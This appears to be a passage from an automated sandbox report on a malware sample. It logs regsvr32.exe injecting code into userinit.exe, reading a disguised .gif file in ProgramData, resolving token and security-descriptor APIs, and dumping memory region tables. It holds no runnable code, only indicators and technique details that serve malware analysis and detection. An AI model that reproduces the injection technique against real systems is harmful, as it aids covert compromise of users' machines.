private_0x0000000000e30000	0x00e30000	0x00ebafff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ebefff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ec2fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ec6fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ecafff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ecefff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ed2fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ed6fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00edafff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00edefff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ee2fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ee6fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eeafff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eeefff	Private Memory	rw	-
userinit.exe	0x00ef0000	0x00ef8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000f00000	0x00f00000	0x01afffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01b00000	0x0242ffff	Memory Mapped File	r	-
private_0x0000000002430000	0x02430000	0x0252ffff	Private Memory	rw	-
private_0x0000000002530000	0x02530000	0x0272ffff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c0fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027ccfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d0fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027dcfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e0fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027ecfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f0fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027fcfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02802fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02806fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0280afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0280efff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02814fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02818fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0281cfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02822fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02826fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282efff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02834fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02838fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0283cfff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028c2fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028c6fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028cafff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028cefff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028e4fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028e8fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028ecfff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028f0fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02906fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290efff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02924fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02928fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292cfff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02930fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02946fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0294afff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0294ffff	Private Memory	-	-
private_0x00000000028d0000	0x028d0000	0x029a0fff	Private Memory	rw	-
private_0x0000000002900000	0x02900000	0x029e2fff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x02a00fff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a42fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x02a62fff	Private Memory	rwx	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	-	-
private_0x0000000002cd0000	0x02cd0000	0x02dcffff	Private Memory	rw	-
sortdefault.nls	0x02dd0000	0x0309efff	Memory Mapped File	r	-
olepro32.dll	0x6ceb0000	0x6cec8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xf54, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (195)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ceb0000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	7	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Üò, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ceb20ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ceb20b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ceb20c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ceb20d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsHungAppWindow, address_out = 0x757e7195	1	Fn
Get Address	c:\windows\system32\user32.dll	function = HungWindowFromGhostWindow, address_out = 0x757d61f5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GhostWindowFromHungWindow, address_out = 0x757ba561	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (8)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Create	xx	class_name = TmarxvxinhhmA, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 2232290	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551596, new_long = 384	1	Fn
Set Attribute	-	index = 18446744073709551612, new_long = 2232277	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #30: userinit.exe

222

0

»

Information	Value
ID	#30
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:36, Reason: Child Process
Unmonitor	End Time: 00:01:41, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0xf74
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F78 0x F8C 0x F90

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	r	-
private_0x0000000000190000	0x00190000	0x00190fff	Private Memory	rw	-
private_0x00000000001a0000	0x001a0000	0x001a0fff	Private Memory	rwx	-
pagefile_0x00000000001b0000	0x001b0000	0x001b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001c0000	0x001c0000	0x001c1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x001d0000	0x001d0fff	Memory Mapped File	r	-
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	rwx	-
private_0x00000000001f0000	0x001f0000	0x0022ffff	Private Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x00330fff	Pagefile Backed Memory	r	-
private_0x0000000000340000	0x00340000	0x0037ffff	Private Memory	rw	-
pagefile_0x0000000000380000	0x00380000	0x00381fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00390000	0x00390fff	Memory Mapped File	r	-
private_0x00000000003b0000	0x003b0000	0x003bffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	-	-
private_0x00000000005d0000	0x005d0000	0x006cffff	Private Memory	rw	-
private_0x00000000006d0000	0x006d0000	0x0074ffff	Private Memory	rw	-
pagefile_0x0000000000750000	0x00750000	0x0082efff	Pagefile Backed Memory	r	-
private_0x0000000000830000	0x00830000	0x008affff	Private Memory	rw	-
private_0x00000000008b0000	0x008b0000	0x008bffff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x009cffff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00940fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00944fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00948fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x0094cfff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00950fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00954fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00958fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x0095cfff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00960fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00964fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00968fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x0096cfff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00970fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00974fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00978fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x0097cfff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00980fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00984fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x00988fff	Private Memory	rw	-
private_0x00000000008c0000	0x008c0000	0x0098cfff	Private Memory	rw	-
private_0x0000000000990000	0x00990000	0x009cffff	Private Memory	rw	-
pagefile_0x00000000009d0000	0x009d0000	0x00dc2fff	Pagefile Backed Memory	r	-
private_0x0000000000dd0000	0x00dd0000	0x00e52fff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e56fff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e5afff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e5efff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e62fff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e66fff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e6afff	Private Memory	rw	-
private_0x0000000000dd0000	0x00dd0000	0x00e6efff	Private Memory	rw	-
userinit.exe	0x00e70000	0x00e78fff	Memory Mapped File	rwx	-
pagefile_0x0000000000e80000	0x00e80000	0x01a7ffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01a80000	0x023affff	Memory Mapped File	r	-
private_0x00000000023b0000	0x023b0000	0x024bcfff	Private Memory	rw	-
private_0x00000000024c0000	0x024c0000	0x025bffff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x027bffff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02862fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02866fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0286afff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0286efff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02872fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02876fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0287afff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0287efff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02882fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02886fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0288afff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0288efff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02894fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02898fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0289cfff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028a2fff	Private Memory	rw	-
